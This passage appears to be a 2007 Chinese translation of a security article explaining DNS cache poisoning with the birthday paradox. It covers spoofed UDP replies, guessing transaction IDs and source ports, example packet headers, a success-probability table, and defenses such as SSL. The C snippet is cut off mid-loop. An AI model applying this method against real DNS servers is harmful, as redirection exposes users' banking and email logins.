生日问题所隐含的理论已经在[Schnabel 1938]名字叫做capture-recapture的统计试验得到应用，来估计湖里鱼的数量。
好，下面我们还是回到我的攻击测试上来，在上述的最为普遍的DNS欺骗攻击中，是在窃听（嗅探）网络以便得到来自X的ID号码，然后回复以相同的ID只是含有攻击者提供的IP。
就像我之前说的，这种攻击需要嗅探网络中的X生成的DNS数据。那这是不是意味着攻击者不能不用嗅探器实施攻击呢？
试着“猜猜”ID怎么样？
为什么不呢，但是ID号是用两字节构成的，这意味着有65535个可能的值！也就是说攻击者如果想要成功攻击的话，他要构造出65535个不同ID号的伪造回复，这样里面至少有且仅有一个包是可用的。
如果这样的攻击的话，我们需要相当好的带宽，而且最重要的是我们不知道何时发送伪造的回复。他就必须先知道对方有个请求，然后紧接着及时地（在真的来自DNS服务器的回复之前）发送回复。
让我们来从另一个角度看问题，我们知道是有可能性去直接麻痹DNS服务器的。回忆一下，攻击者是想DNS服务器询问解析

www.attacker.net

，多亏有从ns.attacker.net来的恶意记录zone transfer，攻击者才可以麻痹DNS服务器的高速缓存器。值得重提的是，这种攻击的局限在于攻击者必须在运行自己带有恶意记录的DNS服务器。
这样的分析之下，如果攻击者没有办法嗅探你的网络数据或者没有自己的服务器，是不是就是说你就远离DNS劫持技术了？
答案是，完全不是这样。
我之前提到过，DNS协议是用UDP回复，UDP是非连接状态的协议，是没有像TCP三次握手的过程的。所以，这也就使得可以非常容易地用你选的任意IP发送UDP包。所以为什么攻击者在可以从任意DNS服务器发送伪造包的情况下要辛辛苦苦地架设起自己地DNS服务器呢？他可以直接询问受害者的DNS服务器解析

www.google.com

，然后立即发送含伪造IP的包给

www.google.com

的域名服务器。
好，这样时间刚好，这样是可行的，所以问题就只有受害者的DNS服务器将要向ns.google.com发送一次请求来得到

www.google.com

的IP，同时有一个请求的ID号。所以又一次的，攻击者就必须发送65535个含ns.google.com的伪造包来做为受害者域名服务器的源地址。至少有一个包是吻合的。所以看来这个可能会成功。
下面就是最有趣的部分了……如果攻击者向受害者的DNS服务器发送了100份请求来解析

www.google.com

会发生什么呢？那么ns.victim.com也将会向ns.google.com发送100份请求，那然后如果我们发送100个从 ns.google.com到ns.victim.com的伪造回复会怎样呢？如果你已经理解了刚刚提到的生日悖论原理，你就应该懂得相比之下冲撞（猜对）的概率已经有了可观的提高。

按此在新窗口打开图片

按此在新窗口打开图片

除此之外，还有个必须注意的小细节——源端口！
试想，ns.victim.com将要向ns.google.com发送请求，UDP头就应该像这样：

Copy code

Source address : ns.victim.com
Destination address : ns.google.com
Source port : 1256 (choosed randomly and > 1024)
Destination port : 53 (DNS port)
Data : What is the IP of www.google.com?
很明显，攻击者必须ns.victim.com的源端口作为目标端口发送伪造的DNS回复，包的内容就像：

Copy code

Source address : ns.google.com
Destination address : ns.victim.com
Source port : 53
Destination port : 1256
Data : The IP of www.google.com is 81.81.81.81
所以如果我们没有嗅探又要怎样猜测源端口呢？“不幸”的是，对大多数DNS服务器来说，源端口是不会为每个客户端而改变的，因此攻击者可以很简单地通过看 ns.victim.com的目前源端口来得到。比方说，如果他有一个域名服务器，他只要请求DNS查找他的域的一个站名，得到的返回查询包就会包含现在在的被ns.victim.com用来发送DNS请求的源端口。
好，现在我知道如何得到源端口了，你可能会对攻击的成功率好奇。这也是我正要讲的。我们的C代码也有所改动：

Copy code

#define POSSIBILITIES 65535.0
void main (void)
{
float chances;
int i, j;
for (i = 0; i
结果如下：
Queries
50
100
150
200
250
300
350
400
500
550
650
750
Chances
0.0185
0.0728
0.1569
0.2621
0.3785
0.4961
0.6069
0.7048
0.8517
0.9008
0.9604
0.9865
我们可以看到，650个构造回复有0.960411的概率成功，近乎100％！
欲知更多详细信息，我建议阅读以下文章：

http://www.kb.cert.org/vuls/id/457875

http://www.securityfocus.com/guest/17905

D)总结
在这篇文章里，我用

www.google.com

做例子，并不是因为我真的对其的重定向攻击感兴趣。这个问题在你访问你的银行账户，在线购书网站甚至是网页电子邮件时尤为重要。
而对于网站管理者来说，可行的防范措施有：
对高速缓存器加以限制，保证不保留额外的记录。
不要用或依赖DNS构架安全体系。
使用SSL之类的加密技术，所以即使被攻击，难度也会加大（见Man in the Middle中的文章）
如有任何想法、评论或批评，欢迎电邮致:

spacefox@securesphere.net

Spacefox,

SecureSphereCrew,

zzjqf17@hotmail.com

Conan,

CBlog,

2007 April